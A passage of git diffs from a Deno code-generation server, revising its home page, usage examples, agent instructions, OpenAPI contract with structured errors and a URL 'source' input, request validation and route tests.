+      <div class="block">
+        <pre><code id="agent-prompt">${
+    escapeHtml(agentPrompt(context))
+  }</code></pre>
+      </div>
+    </details>
+    <details>
+      <summary>generators<span class="hint dim">${generators.length}</span></summary>
+      <ul>
+        ${generatorItems}
+      </ul>
+    </details>
+    <details>
+      <summary>endpoints</summary>
+      <div class="tablewrap"><table>
+        ${endpointRows}
+      </table></div>
+    </details>
+  </div>
+
+  <footer>
+    <span>core ${escapeHtml(coreVersion)}</span>
+    <a href="/llms.txt">/llms.txt</a>
+    <a href="${homepage}">hub &#8599;</a>
+  </footer>
+</main>
+<script>
+  document.querySelectorAll(".copy").forEach((btn) => {
+    btn.addEventListener("click", async (event) => {
+      event.preventDefault();
+      event.stopPropagation();
+      const el = document.getElementById(btn.dataset.copy);
+      await navigator.clipboard.writeText(el.innerText.replace(/^\\$ /, ""));
+      btn.textContent = "[copied \\u2713]";
+      btn.classList.add("done");
+      const block = el.closest(".block");
+      if (block) block.classList.add("flash");
+      setTimeout(() => {
+        btn.textContent = "[copy]";
+        btn.classList.remove("done");
+        if (block) block.classList.remove("flash");
+      }, 1600);
+    });
+  });
+</script>
+</body>
+</html>
+`;
+};

--- a/deno/server/src/homePage.ts
+++ b/deno/server/src/homePage.ts
@@ -78,10 +78,18 @@ export const toStackIdentity = (denoConfig: unknown): StackIdentity => {
   };
 };
 
+/** The zero-asset first command: a public schema URL, nothing to have on
+ *  disk, no stringify step. */
 const curlExample = (origin: string): string =>
   `curl -s -X POST ${origin}/artifacts \\
   -H 'content-type: application/json' \\
-  -d "{\\"protocol\\":\\"oas\\",\\"schema\\":$(jq -Rs . < openapi.json)}"`;
+  -d '{"source":"https://petstore3.swagger.io/api/v3/openapi.json"}'`;
+
+/** The local-file variant: inline the document as a JSON string. */
+const curlFileExample = (origin: string): string =>
+  `curl -s -X POST ${origin}/artifacts \\
+  -H 'content-type: application/json' \\
+  -d "{\\"schema\\":$(jq -Rs . < openapi.json)}"`;
 
 const installCommand = ({ name }: StackIdentity): string =>
   name
@@ -95,14 +103,21 @@ const agentPrompt = ({ identity, origin }: HomePageContext): string =>
 ${identity.description || FALLBACK_DESCRIPTION}
 It is deterministic: the same schema always produces the same output.
 
-1. POST ${origin}/artifacts with JSON body:
-   {"protocol": "oas", "schema": "<OpenAPI v3 document, JSON-stringified>"}
-   (use "gql" with an SDL string for GraphQL)
+1. POST ${origin}/artifacts with JSON body, ONE of:
+   {"source": "<URL of the schema document>"}  - the server fetches it
+   {"schema": "<the document itself, JSON-stringified>"}
+   OpenAPI (JSON/YAML) and GraphQL SDL are auto-detected; pass
+   "protocol": "oas" | "gql" only to override.
 2. Response: {"artifacts": {"<path>": "<content>", ...}, "manifest": {...}}.
-   Write every artifacts entry to disk at its path.
-3. The server fails open: bad schemas return 200 with issues in
-   manifest.parseIssues. Treat level "error" entries as failures; do not
-   retry - fix the schema instead.
+   Write every artifacts entry to disk at its path. When "source" was used,
+   the response echoes {"source": {"url", "resolvedUrl", "digest"}} - keep
+   resolvedUrl to reproduce the run.
+3. Errors are structured JSON: 400 {"error": "invalid_request", "issues":
+   [...]} for a bad body; 422 {"error": "source_fetch_failed" |
+   "invalid_schema", "message"} when the source can't be fetched or the
+   document can't be read. A document that reads but has problems returns
+   200 with issues in manifest.parseIssues - treat level "error" entries as
+   failures; do not retry, fix the schema instead.
 4. GET ${origin}/llms.txt describes this server; GET ${origin}/openapi.json
    is its full API contract.`;
 
@@ -140,22 +155,33 @@ export const homePageMd = (context: HomePageContext): string => {
 
 ${identity.description || FALLBACK_DESCRIPTION}
 
-This is a deployed SKMTC stack server. POST an OpenAPI v3 schema to receive
-generated source files. The same schema always produces the same output, and
-schemas are not stored.
+This is a deployed SKMTC stack server. POST a schema — an OpenAPI document or
+GraphQL SDL, inline or by URL — to receive generated source files. The same
+schema always produces the same output, and schemas are not stored.
 
 ## Use
+
+Point \`source\` at any schema URL:
 
 \`\`\`sh
 ${curlExample(origin)}
 \`\`\`
 
-Returns \`{"artifacts": {"<path>": "<content>", ...}, "manifest": {...}}\` —
-write each artifacts entry to its path.
+Or inline a local file as \`schema\`:
 
-Invalid schemas still return 200, with issues listed in
-\`manifest.parseIssues\`. Treat \`level: "error"\` entries as failures. Retrying
-will not help; fix the schema instead.
+\`\`\`sh
+${curlFileExample(origin)}
+\`\`\`
+
+Returns \`{"artifacts": {"<path>": "<content>", ...}, "manifest": {...}}\` —
+write each artifacts entry to its path. When \`source\` was used, the response
+echoes the final URL and a content digest, so the run is reproducible.
+
+A \`source\` that can't be fetched, or a document that can't be read, returns
+a structured 4xx with a \`message\` saying what to fix. A document that reads
+but has problems returns 200 with issues in \`manifest.parseIssues\` — treat
+\`level: "error"\` entries as failures. Retrying will not help; fix the schema
+instead.
 
 ## When to use it
 
@@ -302,15 +328,25 @@ export const homePageHtml = (context: HomePageContext): string => {
 
   <section>
     <h2>use</h2>
+    <p class="dim">Point <code>source</code> at any schema URL — OpenAPI or
+    GraphQL SDL, auto-detected:</p>
     <div class="block">
       <button class="copy" data-copy="curl-cmd">[copy]</button>
       <pre><code id="curl-cmd"><span class="p">$</span> ${
     escapeHtml(curlExample(origin))
   }</code></pre>
     </div>
+    <p class="dim">Or inline a local file as <code>schema</code>:</p>
+    <div class="block">
+      <button class="copy" data-copy="curl-file-cmd">[copy]</button>
+      <pre><code id="curl-file-cmd"><span class="p">$</span> ${
+    escapeHtml(curlFileExample(origin))
+  }</code></pre>
+    </div>
     <p>Returns <code>{"artifacts": {"&lt;path&gt;": "&lt;content&gt;", …},
     "manifest": {…}}</code> — write each entry to its path.</p>
-    <p class="dim">Invalid schemas still return 200. Check
+    <p class="dim">Fetch or read failures return structured 4xx errors. A
+    schema that reads but has problems returns 200 — check
     <code>manifest.parseIssues</code> before using the output.</p>
   </section>
 

--- a/deno/server/src/homePage.ts
+++ b/deno/server/src/homePage.ts
@@ -10,6 +10,8 @@
 // <details> disclosure; the markdown variant is flat and complete because
 // agents want the whole contract inline.
 
+import * as v from "valibot";
+
 /** Deploy-time identity shown on the home page. All fields optional — a
  *  server created without one still serves a useful, generic page. */
 export type StackIdentity = {
@@ -37,6 +39,46 @@ export type HomePageContext = {
 const FALLBACK_NAME = "skmtc stack server";
 const FALLBACK_DESCRIPTION = "Convert an OpenAPI v3 schema into source files.";
 const FALLBACK_HOMEPAGE = "https://skmtc.dev";
+
+/** The `deno.json` fields the home page reads. `name` and `version` are the
+ *  standard package fields publish already requires; `description` and
+ *  `homepage` are optional extras a stack author can add. Unknown keys are
+ *  ignored. */
+const stackDenoConfig = v.object({
+  name: v.optional(v.string()),
+  version: v.optional(v.string()),
+  description: v.optional(v.string()),
+  homepage: v.optional(v.string()),
+});
+
+/**
+ * Derive the home page identity from a stack's parsed `deno.json` — the one
+ * source both the CLI and the hub already require. The synthesized `server.ts`
+ * entry sits beside `deno.json`, so it can pass the file straight through:
+ *
+ * ```ts
+ * import denoConfig from './deno.json' with { type: 'json' }
+ * export default createServer({ ..., identity: toStackIdentity(denoConfig) })
+ * ```
+ *
+ * `name` drops the leading `@` (`@skmtc/markdown-docs` → `skmtc/markdown-docs`)
+ * and, when `homepage` is absent, the hub page is derived from it. Fails soft:
+ * an unreadable config yields an empty identity and the generic page.
+ */
+export const toStackIdentity = (denoConfig: unknown): StackIdentity => {
+  const parsed = v.safeParse(stackDenoConfig, denoConfig);
+  if (!parsed.success) return {};
+  const { name, version, description, homepage } = parsed.output;
+  const label = name?.startsWith("@") ? name.slice(1) : name;
+  const homepageUrl = homepage ??
+    (label ? `${FALLBACK_HOMEPAGE}/${label}` : undefined);
+  return {
+    ...(label !== undefined ? { name: label } : {}),
+    ...(version !== undefined ? { version } : {}),
+    ...(description !== undefined ? { description } : {}),
+    ...(homepageUrl !== undefined ? { homepageUrl } : {}),
+  };
+};
 
 /** Resolved `@skmtc/core` version — the same skew canary trick the hosted
  *  wrapper uses. Resolution shapes seen live:

--- a/deno/server/src/homePage.ts
+++ b/deno/server/src/homePage.ts
@@ -32,8 +32,6 @@ export type HomePageContext = {
   generators: string[];
   /** The serving origin, from the request URL. */
   origin: string;
-  /** Resolved `@skmtc/core` version. */
-  coreVersion: string;
 };
 
 const FALLBACK_NAME = "skmtc stack server";
@@ -78,21 +76,6 @@ export const toStackIdentity = (denoConfig: unknown): StackIdentity => {
     ...(description !== undefined ? { description } : {}),
     ...(homepageUrl !== undefined ? { homepageUrl } : {}),
   };
-};
-
-/** Resolved `@skmtc/core` version — the same skew canary trick the hosted
- *  wrapper uses. Resolution shapes seen live:
- *  `https://jsr.io/@skmtc/core/0.26.0/mod.ts` and `jsr:@skmtc/core@0.26.0`. */
-export const resolveCoreVersion = (): string => {
-  try {
-    const resolved = import.meta.resolve("@skmtc/core");
-    const match = /@skmtc\/core[@/]([^/]+)/.exec(resolved);
-    // A workspace-path resolution has no version in it — show "unknown"
-    // rather than a file URL.
-    return match ? match[1] : "unknown";
-  } catch {
-    return "unknown";
-  }
 };
 
 const curlExample = (origin: string): string =>
@@ -144,7 +127,7 @@ const escapeHtml = (text: string): string =>
 /** The flat, complete markdown page — served at `/` (non-browser Accept),
  *  `/index.md` and `/llms.txt`. */
 export const homePageMd = (context: HomePageContext): string => {
-  const { identity, generators, origin, coreVersion } = context;
+  const { identity, generators, origin } = context;
   const name = identity.name ?? FALLBACK_NAME;
   const homepage = identity.homepageUrl ?? FALLBACK_HOMEPAGE;
   const endpoints = ENDPOINT_LINES.map(([route, what]) =>
@@ -207,13 +190,13 @@ ${agentPrompt(context)}
 \`\`\`
 
 ---
-core ${coreVersion} · ${homepage}
+${homepage}
 `;
 };
 
 /** The layered HTML page — served at `/` to browsers (`Accept: text/html`). */
 export const homePageHtml = (context: HomePageContext): string => {
-  const { identity, generators, origin, coreVersion } = context;
+  const { identity, generators, origin } = context;
   const name = escapeHtml(identity.name ?? FALLBACK_NAME);
   const homepage = escapeHtml(identity.homepageUrl ?? FALLBACK_HOMEPAGE);
   const tagline = escapeHtml(identity.description || FALLBACK_DESCRIPTION);
@@ -378,7 +361,6 @@ export const homePageHtml = (context: HomePageContext): string => {
   </div>
 
   <footer>
-    <span>core ${escapeHtml(coreVersion)}</span>
     <a href="/llms.txt">/llms.txt</a>
     <a href="${homepage}">hub &#8599;</a>
   </footer>

--- a/deno/server/src/homePage.ts
+++ b/deno/server/src/homePage.ts
@@ -113,8 +113,9 @@ export const homePageMd = (context: HomePageContext): string => {
 
 ${identity.description || FALLBACK_DESCRIPTION}
 
-A deployed SKMTC stack server: POST a schema, receive generated source files.
-Deterministic — same schema in, same bytes out. Nothing is stored.
+This is a deployed SKMTC stack server. POST an OpenAPI v3 schema to receive
+generated source files. The same schema always produces the same output, and
+schemas are not stored.
 
 ## Use
 
@@ -125,9 +126,9 @@ ${curlExample(origin)}
 Returns \`{"artifacts": {"<path>": "<content>", ...}, "manifest": {...}}\` —
 write each artifacts entry to its path.
 
-Bad schemas do not error: the response is 200 with issues in
-\`manifest.parseIssues\`. Treat \`level: "error"\` entries as failures; do not
-retry — runs are deterministic, so fix the schema instead.
+Invalid schemas still return 200, with issues listed in
+\`manifest.parseIssues\`. Treat \`level: "error"\` entries as failures. Retrying
+will not help; fix the schema instead.
 
 ## When to use it
 
@@ -265,7 +266,6 @@ export const homePageHtml = (context: HomePageContext): string => {
       : ""
   }</div>
     <div>${tagline}</div>
-    <div class="dim">Deterministic — same schema in, same bytes out. Nothing is stored.</div>
     <nav aria-label="formats">
       <a href="/index.md">.md</a>
       <a href="/openapi.json">openapi.json</a>
@@ -283,8 +283,8 @@ export const homePageHtml = (context: HomePageContext): string => {
     </div>
     <p>Returns <code>{"artifacts": {"&lt;path&gt;": "&lt;content&gt;", …},
     "manifest": {…}}</code> — write each entry to its path.</p>
-    <p class="dim">Bad schemas don't error; they log. Check
-    <code>manifest.parseIssues</code> before trusting partial output.</p>
+    <p class="dim">Invalid schemas still return 200. Check
+    <code>manifest.parseIssues</code> before using the output.</p>
   </section>
 
   <div>

--- a/deno/server/src/homePage.ts
+++ b/deno/server/src/homePage.ts
@@ -50,6 +50,22 @@ const stackDenoConfig = v.object({
 });
 
 /**
+ * Keep a `homepage` only when it is an http(s) URL. The value comes from a
+ * stack's own `deno.json` and lands in `href` attributes on the rendered
+ * page, so a `javascript:` URL would execute on the deployment's origin.
+ * Anything else is dropped and the derived hub link takes over.
+ */
+const toHomepageUrl = (homepage: string | undefined): string | undefined => {
+  if (homepage === undefined) return undefined;
+  try {
+    const { protocol } = new URL(homepage);
+    return protocol === "http:" || protocol === "https:" ? homepage : undefined;
+  } catch {
+    return undefined;
+  }
+};
+
+/**
  * Derive the home page identity from a stack's parsed `deno.json` — the one
  * source both the CLI and the hub already require. The synthesized `server.ts`
  * entry sits beside `deno.json`, so it can pass the file straight through:
@@ -60,15 +76,16 @@ const stackDenoConfig = v.object({
  * ```
  *
  * `name` drops the leading `@` (`@skmtc/markdown-docs` → `skmtc/markdown-docs`)
- * and, when `homepage` is absent, the hub page is derived from it. Fails soft:
- * an unreadable config yields an empty identity and the generic page.
+ * and, when `homepage` is absent or not an http(s) URL, the hub page is derived
+ * from it. Fails soft: an unreadable config yields an empty identity and the
+ * generic page.
  */
 export const toStackIdentity = (denoConfig: unknown): StackIdentity => {
   const parsed = v.safeParse(stackDenoConfig, denoConfig);
   if (!parsed.success) return {};
   const { name, version, description, homepage } = parsed.output;
   const label = name?.startsWith("@") ? name.slice(1) : name;
-  const homepageUrl = homepage ??
+  const homepageUrl = toHomepageUrl(homepage) ??
     (label ? `${FALLBACK_HOMEPAGE}/${label}` : undefined);
   return {
     ...(label !== undefined ? { name: label } : {}),

--- a/deno/server/src/homePage.ts
+++ b/deno/server/src/homePage.ts
@@ -87,9 +87,11 @@ export const resolveCoreVersion = (): string => {
   try {
     const resolved = import.meta.resolve("@skmtc/core");
     const match = /@skmtc\/core[@/]([^/]+)/.exec(resolved);
-    return match ? match[1] : resolved;
+    // A workspace-path resolution has no version in it — show "unknown"
+    // rather than a file URL.
+    return match ? match[1] : "unknown";
   } catch {
-    return "unresolved";
+    return "unknown";
   }
 };
 

--- a/deno/server/src/openapi.test.ts
+++ b/deno/server/src/openapi.test.ts
@@ -15,20 +15,26 @@ const collectRefs = (node: unknown, acc: string[] = []): string[] => {
   return acc;
 };
 
-const EXPECTED_PATHS = [
-  "/artifacts",
-  "/subjects",
-  "/enrichment-defaults",
-  "/generators",
-  "/descriptors",
-  "/validate",
-  "/to-v3-json",
-];
+/**
+ * Every path the app actually routes, taken from Hono's own route table —
+ * NOT a hand-maintained list, which would let a new route ship undocumented.
+ * `method: 'ALL'` entries are middleware (the CORS handler), not routes.
+ */
+const servedPaths = (): string[] => {
+  const app = createServer({ toGeneratorConfigMap: () => ({}) });
+  return [
+    ...new Set(
+      app.routes.filter((route) => route.method !== "ALL").map((route) =>
+        route.path
+      ),
+    ),
+  ].sort();
+};
 
 Deno.test("buildOpenApiDocument - documents every route the server serves", () => {
   const doc = buildOpenApiDocument();
   assertEquals(doc.openapi, "3.1.0");
-  assertEquals(Object.keys(doc.paths ?? {}).sort(), [...EXPECTED_PATHS].sort());
+  assertEquals(Object.keys(doc.paths ?? {}).sort(), servedPaths());
 });
 
 Deno.test("buildOpenApiDocument - request bodies are derived from the valibot schemas", () => {
@@ -63,7 +69,7 @@ Deno.test("GET /openapi.json - serves the committed contract", async () => {
   assertEquals(res.status, 200);
   const doc = await res.json();
   assertEquals(doc.openapi, "3.1.0");
-  assertEquals(Object.keys(doc.paths).sort(), [...EXPECTED_PATHS].sort());
+  assertEquals(Object.keys(doc.paths).sort(), servedPaths());
 });
 
 Deno.test("openapi.json - committed artifact is in sync with the source schemas", async () => {

--- a/deno/server/src/openapi.test.ts
+++ b/deno/server/src/openapi.test.ts
@@ -52,6 +52,21 @@ Deno.test("buildOpenApiDocument - request bodies are derived from the valibot sc
   assertEquals("protocol" in properties, true);
 });
 
+Deno.test("buildOpenApiDocument - the schema-input requests carry the exactly-one rule", () => {
+  // `@valibot/to-json-schema` cannot express the pipe's `v.check` and drops
+  // it, so without the restore step the contract says an empty body — or one
+  // carrying both fields — is valid, while the server answers 400.
+  const doc = buildOpenApiDocument();
+  for (const name of ["ArtifactsRequest", "ToV3JsonRequest"]) {
+    const schema = doc.components?.schemas?.[name];
+    assertExists(schema, name);
+    assertEquals("oneOf" in schema ? schema.oneOf : undefined, [
+      { required: ["schema"] },
+      { required: ["source"] },
+    ], name);
+  }
+});
+
 Deno.test("buildOpenApiDocument - every $ref resolves to a component", () => {
   const doc = buildOpenApiDocument();
   const schemas = new Set(Object.keys(doc.components?.schemas ?? {}));

--- a/deno/server/src/openapi.test.ts
+++ b/deno/server/src/openapi.test.ts
@@ -1,4 +1,4 @@
-import { assertEquals, assertExists } from "jsr:@std/assert@^1.0.10";
+import { assertEquals, assertExists } from "@std/assert";
 import { buildOpenApiDocument } from "./openapi.ts";
 import { createServer } from "./createServer.ts";
 
@@ -34,11 +34,16 @@ Deno.test("buildOpenApiDocument - documents every route the server serves", () =
 Deno.test("buildOpenApiDocument - request bodies are derived from the valibot schemas", () => {
   const doc = buildOpenApiDocument();
   const artifactsRequest = doc.components?.schemas?.ArtifactsRequest;
-  // The `postArtifactsBody` variant converts to an `anyOf` over the oas/gql
-  // branches — proof the request schema came from the runtime validator, not a
-  // hand-written stub.
+  // `postArtifactsBody` converts to an object schema carrying both input
+  // fields (`schema` inline / `source` URL) — proof the request schema came
+  // from the runtime validator, not a hand-written stub.
   assertExists(artifactsRequest);
-  assertEquals("anyOf" in artifactsRequest, true);
+  const properties = "properties" in artifactsRequest
+    ? artifactsRequest.properties ?? {}
+    : {};
+  assertEquals("schema" in properties, true);
+  assertEquals("source" in properties, true);
+  assertEquals("protocol" in properties, true);
 });
 
 Deno.test("buildOpenApiDocument - every $ref resolves to a component", () => {

--- a/deno/server/src/openapi.ts
+++ b/deno/server/src/openapi.ts
@@ -11,9 +11,11 @@ import {
 
 /**
  * Builds the stack server's own published OpenAPI 3.1 contract — the full public
- * surface of a deployed `@skmtc/server` bundle (all seven routes), so the CLI,
- * the preview container and third parties can generate a typed client against a
- * running server.
+ * surface of a deployed `@skmtc/server` bundle (every route it serves), so the
+ * CLI, the preview container and third parties can generate a typed client
+ * against a running server. `openapi.test.ts` derives its expectation from the
+ * app's own route table, so a route added to `createServer` and not documented
+ * here fails the test.
  *
  * This is the AUTHORITATIVE source-of-truth spec (plan §9.2). It differs from the
  * hub's `StackServerApi` contract, which documents only the three routes the hub
@@ -409,6 +411,20 @@ const toV3JsonResponse: Schema = {
 
 // --- Operation helpers --------------------------------------------------------
 
+/** A route that returns the self-description as text, not JSON. */
+const textResponse = (
+  description: string,
+  mediaTypes: string[],
+): OpenAPIV3.ResponseObject => {
+  const stringSchema: Schema = { type: "string" };
+  return {
+    description,
+    content: Object.fromEntries(
+      mediaTypes.map((mediaType) => [mediaType, { schema: stringSchema }]),
+    ),
+  };
+};
+
 const jsonBody = (schemaRef: Ref | Schema): OpenAPIV3.RequestBodyObject => ({
   required: true,
   content: { "application/json": { schema: schemaRef } },
@@ -456,6 +472,47 @@ export const buildOpenApiDocument = (): OpenAPIV3.Document => ({
       "(bundle, schema, client settings).",
   },
   paths: {
+    "/": {
+      get: {
+        operationId: "homePage",
+        summary: "The server's self-description",
+        description:
+          "Content-negotiated on `Accept`: a browser (`text/html`) gets the " +
+          "HTML page, anything else the flat markdown contract — the same " +
+          "text `/index.md` and `/llms.txt` serve.",
+        responses: {
+          "200": textResponse("The self-description.", [
+            "text/html",
+            "text/markdown",
+          ]),
+        },
+      },
+    },
+    "/index.md": {
+      get: {
+        operationId: "homePageMarkdown",
+        summary: "The self-description as markdown",
+        description: "The markdown variant of `/`, unconditionally.",
+        responses: {
+          "200": textResponse("The self-description, as markdown.", [
+            "text/markdown",
+          ]),
+        },
+      },
+    },
+    "/llms.txt": {
+      get: {
+        operationId: "homePageLlmsTxt",
+        summary: "The self-description at the llms.txt convention path",
+        description:
+          "The same markdown as `/index.md`, at the path agents look for.",
+        responses: {
+          "200": textResponse("The self-description, as markdown.", [
+            "text/plain",
+          ]),
+        },
+      },
+    },
     "/artifacts": {
       post: {
         operationId: "generateArtifacts",
@@ -573,6 +630,22 @@ export const buildOpenApiDocument = (): OpenAPIV3.Document => ({
             toV3JsonResponse,
           ),
           ...errorResponses,
+        },
+      },
+    },
+    "/openapi.json": {
+      get: {
+        operationId: "openApiDocument",
+        summary: "This contract",
+        description:
+          "The server's own OpenAPI 3.1 document — the one you are reading. " +
+          "Served as a committed static artifact, so it is a pure function of " +
+          "the package version.",
+        responses: {
+          "200": jsonResponse("This OpenAPI document.", {
+            type: "object",
+            additionalProperties: true,
+          }),
         },
       },
     },

--- a/deno/server/src/openapi.ts
+++ b/deno/server/src/openapi.ts
@@ -33,7 +33,7 @@ import {
 
 /** The server-contract version — bump on a breaking change to any route's
  *  request/response shape. Independent of the `@skmtc/server` package version. */
-export const SERVER_API_VERSION = "1.0.0";
+export const SERVER_API_VERSION = "1.1.0";
 
 type Schema = OpenAPIV3.SchemaObject;
 type Ref = OpenAPIV3.ReferenceObject;
@@ -255,6 +255,62 @@ const enrichmentDescriptor: Schema = {
   },
 };
 
+/** Echo of a fetched `source` input — the reproducibility receipt. */
+const resolvedSource: Schema = {
+  type: "object",
+  required: ["url", "resolvedUrl", "digest"],
+  description:
+    "Present when the request used `source`: the URL as requested, the final " +
+    "URL after redirects (keep this one — when the source redirects to a " +
+    "content-addressed form it pins the exact document), and a " +
+    "`sha256:<hex>` digest of the fetched bytes.",
+  properties: {
+    url: { type: "string", description: "The `source` URL as requested." },
+    resolvedUrl: {
+      type: "string",
+      description: "The final URL after redirects.",
+    },
+    digest: {
+      type: "string",
+      description: "`sha256:<hex>` digest of the fetched bytes.",
+    },
+  },
+};
+
+/** The structured error body every non-200 response carries. */
+const errorResponse: Schema = {
+  type: "object",
+  required: ["error", "message"],
+  properties: {
+    error: {
+      type: "string",
+      enum: [
+        "invalid_request",
+        "source_fetch_failed",
+        "invalid_schema",
+        "internal_error",
+      ],
+      description: "Machine-readable error code.",
+    },
+    message: { type: "string", description: "What went wrong, actionably." },
+    issues: {
+      type: "array",
+      description: "Field-level validation issues (`invalid_request` only).",
+      items: {
+        type: "object",
+        required: ["message"],
+        properties: {
+          path: {
+            type: "string",
+            description: "Dot path of the offending field.",
+          },
+          message: { type: "string" },
+        },
+      },
+    },
+  },
+};
+
 // --- Response envelopes -------------------------------------------------------
 
 const artifactsResponse = (): Schema => ({
@@ -278,6 +334,7 @@ const artifactsResponse = (): Schema => ({
       description:
         "Per-Definition generation-map index (file → schema origin).",
     },
+    source: ref("ResolvedSource"),
   },
 });
 
@@ -365,14 +422,21 @@ const jsonResponse = (
   content: { "application/json": { schema } },
 });
 
-/** The error responses a route can return. `422` covers a schema parse failure,
- *  an invalid body, or a generator throw (the server has no dedicated 4xx split). */
+/** The error responses a route can return, all carrying the structured
+ *  `ErrorResponse` body: 400 for a body that fails validation (with
+ *  field-level `issues`), 422 for a `source` that could not be fetched or a
+ *  document that could not be read at all. A document that reads but has
+ *  problems is NOT an error — it returns 200 with `manifest.parseIssues`. */
 const errorResponses: OpenAPIV3.ResponsesObject = {
-  "400": { description: "Malformed request body." },
-  "422": {
-    description:
-      "Unprocessable — schema parse failure, invalid config, or generator error.",
-  },
+  "400": jsonResponse(
+    "Malformed request — invalid JSON body or failed validation.",
+    ref("ErrorResponse"),
+  ),
+  "422": jsonResponse(
+    "Unprocessable — the `source` could not be fetched, or the document " +
+      "could not be read as a schema.",
+    ref("ErrorResponse"),
+  ),
 };
 
 /**
@@ -397,9 +461,12 @@ export const buildOpenApiDocument = (): OpenAPIV3.Document => ({
         operationId: "generateArtifacts",
         summary: "Generate code artifacts from a schema",
         description:
-          "Parse → transform → render the posted schema through the bundled " +
+          "Parse → transform → render the schema through the bundled " +
           "generators, returning the generated files, the run manifest, and the " +
-          "attribution sidecars + generation map.",
+          "attribution sidecars + generation map. The schema arrives inline " +
+          "(`schema`) or by URL (`source` — fetched by the server, echoed back " +
+          "with its resolved URL and content digest); `protocol` is inferred " +
+          "from the document when omitted.",
         requestBody: jsonBody(ref("ArtifactsRequest")),
         responses: {
           "200": jsonResponse(
@@ -524,6 +591,8 @@ export const buildOpenApiDocument = (): OpenAPIV3.Document => ({
       GeneratorSupport: generatorSupport,
       EnrichmentDescriptor: enrichmentDescriptor,
       EnrichmentValidationIssue: enrichmentValidationIssue,
+      ResolvedSource: resolvedSource,
+      ErrorResponse: errorResponse,
     },
   },
 });

--- a/deno/server/src/openapi.ts
+++ b/deno/server/src/openapi.ts
@@ -122,6 +122,28 @@ const derive = (
   return components;
 };
 
+/**
+ * Re-state the "exactly one of `schema` / `source`" rule on a derived request
+ * component. The rule lives in a `v.check` on the valibot pipe, and
+ * `@valibot/to-json-schema` cannot represent a `check` — `errorMode: 'ignore'`
+ * drops it silently, leaving both fields optional and unconstrained. Without
+ * this the published contract says an empty body is valid while the server
+ * answers 400, and a client generated from the document has no signal.
+ *
+ * `oneOf` is exact here: with both fields present both branches match (so the
+ * document rejects it), with neither present neither matches.
+ */
+const withExactlyOneInput = (
+  components: Record<string, Schema>,
+  name: string,
+): Record<string, Schema> => ({
+  ...components,
+  [name]: {
+    ...components[name],
+    oneOf: [{ required: ["schema"] }, { required: ["source"] }],
+  },
+});
+
 // --- Hand-modeled response schemas (no runtime valibot schema in core) --------
 
 /** A schema parse / validation issue — `@skmtc/core`'s `ParseIssue`. */
@@ -652,10 +674,18 @@ export const buildOpenApiDocument = (): OpenAPIV3.Document => ({
   },
   components: {
     schemas: {
-      // Derived from the runtime valibot schemas — cannot drift from the server.
-      ...derive("ArtifactsRequest", postArtifactsBody),
+      // Derived from the runtime valibot schemas — cannot drift from the
+      // server, except for the pipe-level `check` the converter cannot
+      // express, which `withExactlyOneInput` restores.
+      ...withExactlyOneInput(
+        derive("ArtifactsRequest", postArtifactsBody),
+        "ArtifactsRequest",
+      ),
       ...derive("ValidateRequest", validateBody),
-      ...derive("ToV3JsonRequest", toV3JsonBody),
+      ...withExactlyOneInput(
+        derive("ToV3JsonRequest", toV3JsonBody),
+        "ToV3JsonRequest",
+      ),
       ...derive("Manifest", manifestContent),
       ...derive("Sidecar", sidecarSchema),
       ...derive("GenerationMapEntry", generationMapEntry),

--- a/deno/server/src/openapi.ts
+++ b/deno/server/src/openapi.ts
@@ -326,7 +326,10 @@ const errorResponse: Schema = {
         properties: {
           path: {
             type: "string",
-            description: "Dot path of the offending field.",
+            description:
+              "Dot path of the offending field. Absent when the issue is a " +
+              "whole-body rule rather than one field — `schema`/`source` " +
+              "exactly-one, for instance.",
           },
           message: { type: "string" },
         },

--- a/deno/server/src/requestSchemas.ts
+++ b/deno/server/src/requestSchemas.ts
@@ -10,6 +10,14 @@ import { clientSettings as settingsSchema } from "@skmtc/core";
  * the documented contract cannot drift from what the server actually accepts.
  */
 
+/** The request body itself was not JSON. Distinct from a `SyntaxError`
+ *  thrown deeper in a run (a generator reading a malformed `x-` extension,
+ *  say) — that is a server fault and must stay a 500, not become "your body
+ *  is not valid JSON". Maps to a structured 400. */
+export class InvalidBodyError extends Error {
+  override name = "InvalidBodyError";
+}
+
 const protocolSchema = v.pipe(
   v.picklist(["oas", "gql"]),
   v.description(
@@ -27,8 +35,10 @@ const sourceSchema = v.pipe(
     "`source` must use http or https.",
   ),
   v.description(
-    "URL of the schema document. The server fetches it (following redirects) " +
-      "and echoes the final URL + content digest in the response.",
+    "URL of the schema document. The server fetches it (following redirects, " +
+      "checking each hop) and echoes the final URL + content digest in the " +
+      "response. Must be publicly reachable: a URL naming a loopback, " +
+      "private, link-local or `.internal` host is refused.",
   ),
 );
 

--- a/deno/server/src/requestSchemas.ts
+++ b/deno/server/src/requestSchemas.ts
@@ -10,45 +10,61 @@ import { clientSettings as settingsSchema } from "@skmtc/core";
  * the documented contract cannot drift from what the server actually accepts.
  */
 
+const protocolSchema = v.pipe(
+  v.picklist(["oas", "gql"]),
+  v.description(
+    "Schema protocol. Optional — inferred from the document content when " +
+      "omitted (a JSON/YAML document with an `openapi` or `swagger` key is " +
+      "`oas`; anything else is treated as GraphQL SDL).",
+  ),
+);
+
+const sourceSchema = v.pipe(
+  v.string(),
+  v.url("`source` must be an absolute http(s) URL to fetch the schema from."),
+  v.check(
+    (url) => url.startsWith("http://") || url.startsWith("https://"),
+    "`source` must use http or https.",
+  ),
+  v.description(
+    "URL of the schema document. The server fetches it (following redirects) " +
+      "and echoes the final URL + content digest in the response.",
+  ),
+);
+
+const EXACTLY_ONE_MESSAGE =
+  "Provide exactly one of `schema` (inline document) or `source` (URL).";
+
 /**
- * Body schemas for `POST /artifacts`, modeled as a discriminated union over
- * `protocol`. Each variant declares the field it actually needs — there are no
- * optional / "maybe present" fields whose presence depends on another field's
- * value.
+ * Body schema for `POST /artifacts`, `POST /subjects` and
+ * `POST /enrichment-defaults`.
  *
- * The shared half (`schema`, `clientSettings`) is spread into each variant
- * rather than extracted into a base, because the branching shape is the more
- * important property to make obvious.
+ * The schema input is EXACTLY ONE of:
+ * - `schema` — the document itself, as a string (JSON/YAML OpenAPI, or SDL)
+ * - `source` — an http(s) URL the server fetches the document from
+ *
+ * `protocol` is optional either way: when omitted, the server infers it from
+ * the document content. Passing it explicitly overrides inference.
  */
-export const oasArtifactsBody = v.object({
-  protocol: v.literal("oas"),
-  schema: v.string(),
-  clientSettings: v.optional(settingsSchema),
-  /** Schema source identifier stamped onto each sidecar's `src` field
-   *  (e.g. `'openapi.json'`). Optional — defaults to the protocol name. */
-  schemaSrc: v.optional(v.string()),
-});
-
-export const gqlArtifactsBody = v.object({
